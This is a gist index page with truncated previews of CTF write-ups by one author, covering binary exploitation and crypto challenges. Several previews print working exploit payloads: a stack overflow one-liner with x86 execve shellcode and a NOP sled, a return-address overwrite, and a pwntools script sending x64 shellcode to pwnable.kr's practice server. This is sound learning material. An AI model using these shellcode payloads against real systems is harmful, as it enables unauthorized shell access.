parksjin01’s gists

parksjin01 / CSAW liaotian 2012 writeup.md

Created February 22, 2017 08:41

CSAW liaotian 2012

You can get binary at here

File name is chinese so I changed it to liaotian(liaotian is pronounciation of that chinese words).
It was really hard because this program print chinese instead of english and I used google translator to understand it.

Same as before problem it is socket program and use signal to call program.
I run that program at local.

To solve this problem at local, first I run this program at root privileged.
Also you should have user liaotian to solve this problem.

parksjin01 / CSAW exploitation-release 2012 writeup.md

Created February 22, 2017 03:42

CSAW exploitation1-release 2012

You can get bin file at here

It's really easy prob. Only we need to do is just get correct password.
If we send correct password then bin returns key file content(what we need). At 0x080489a4 there are strcmp functions,
which compare our input with AAAAAAAAAAAAAAAAAAAAAAAAAA. We can easily guess correct password is AAAAAAAAAAAAAAAAAAAAAAAAAA

parksjin01 / 9447-ctf 2014 europe writeup.md

Created February 21, 2017 07:31

9447-ctf 2014 europe1

You can get this program at 'here'

First problem is that it cause fscanf sigfault when execute this program. Because this program needs 4 files to run it.

flag01: The answer what we need to get
flag02: I don't know why this has to be exist.
passwd: Password for admin
salt: Maybe ID for admin

I created it in my self.

parksjin01 / CSAW 2011 Crypto8.md

Last active February 10, 2017 14:20

CSAW 2011 Crypto8

You can get txt file in 'here'
Now if we solve this problem, we can get 300 points. It means problem is harder then before.
I skimmed it and thought it was generated by Caesar. However it was wrong. There are most normal sentence however it was little bit strange.
Sentence is like this

4 steps decrypted sentence is: AGAIM TE HASE WEAOMED QHAQ VRO QOAMPLIPPIVMP AOE BEIMG LVMIQVOED.
AP A OEPRWQ TE AOE CHAMGIMG QHE EMCOXUQIVM LEQHVD AGAIM. QHE MET KEX FVO MEUQ LEEQIMG TIWW BE UVWXGVM.
IQ IP ILUEOAQISE QHAQ XVR AWW AQQEMD AWW LEEQIMGP FOVL HEOE VM IM.

Now I will edit it by hands.

M -> N

parksjin01 / 31c3-ctf-2014 cfy writeup.md

Last active January 12, 2017 07:21

31c3-ctf-2014 cfy writeup

#You can get binary in https://github.com/ctfs/write-ups-2014/tree/master/31c3-ctf-2014/pwn/cfy

First we can found how to change rip. We can change rip by input option like [0, 1, 2, 3].
Now we have to select things. First change rip directly to system. Other method is load shellcode and change rip to shellcode addr. I think calculate shellcode addr in this program is hard so I select change rip directly to system. However we can't change rip to system. This program get option as int range but if we want to change rip to system it is out of range.

So I will load kind of shellcode in buf. I will write /bin//sh at the begining of buf and write address of system after that. Why I wrote /bin//sh first? Because we have to send argv to system as /bin//sh and x64 architecture pass argv by rdi register. before call rax there are mov rdi, buf. We have to insert \x00\x00\x00\x00\x00\x00\x00\x00 between `/bin//sh

parksjin01 / ####PlaidCTF pwn-200 ezhp writeup.md

Created January 6, 2017 09:16

####PlaidCTF pwn-200 ezhp writeup

First this programs vuln is related with heap. Because if we create note, remove note and print note then program print sigfault.
We can't use disas main in this program. I don't know the reason but anyway main is start at 0x08048a48. Main function's code is like this.

   0x8048a48:	push   ebp
   0x8048a49:	mov    ebp,esp
   0x8048a4b:	and    esp,0xfffffff0
   0x8048a4e:	sub    esp,0x20
   0x8048a51:	mov    DWORD PTR [esp+0x1c],0x0
   0x8048a59:	jmp    0x8048aa9
   0x8048a5b:	call   0x80489eb

parksjin01 / HolyShield7 pwnit writeup.md

Created January 5, 2017 12:53

HolyShield7 pwnit writeup

#You can download bin in here

This program has only ASLR as memory protection.
We can load shellcode in buffer and execute it to get shell.

First I'll suppose ASLR is turned off. Then buffer address is fixed as 0xffffd620(It may be different in your computer)
I'll use shellcode in here
I'll create payload as like this. Nop sled(21bytes)+shellcode(23bytes)+sfp+ret(0xffffd620)

(python -c 'print "2\n"+"\x90"*21+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"+"ABCD"+"\x20\xd6\xff\xff"+"3\n"';cat) | ./pwnit

parksjin01 / CSAW-CTF-warmup-100 writeup.md

Last active March 16, 2017 20:47

CSAW-CTF-warmup-100 writeup

#You can download bin in here

First same as title(warmup) it's really easy.
First I'll assump there are no ASLR.
We have to call easy function to get shell.
We can call it by this payload

(python -c 'print "a"*0x48+"\x0d\x06\x40\x00\x00\x00\x00\x00"';cat) | ./warmup

parksjin01 / CSAW-CTF-precision-100 writeup.md

Last active January 4, 2017 13:04

CSAW-CTF-precision-100 writeup

#You can download this bin in Here

First let's check how this program work.

First print where buffer is located. Next we should type something.
Finally program print what we typed above.
But if we type more then 0x80 length of strings then program just show NOPE instead of typed string.

Now let's get shell in this program. I think this program has ASLR for memory protect. However it prints buffer address in first

parksjin01 / pwnable.kr echo1 writeup.md

Created January 2, 2017 12:34

pwnable.kr echo1 writeup

from pwn import *

proc = remote("pwnable.kr", 9010) 
proc.sendline(asm("jmp rsp", arch="amd64", os="linux"))
proc.sendline("1")
proc.sendline("a"*40+p64(0x6020a0)+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")
proc.interactive()

Damotorie parksjin01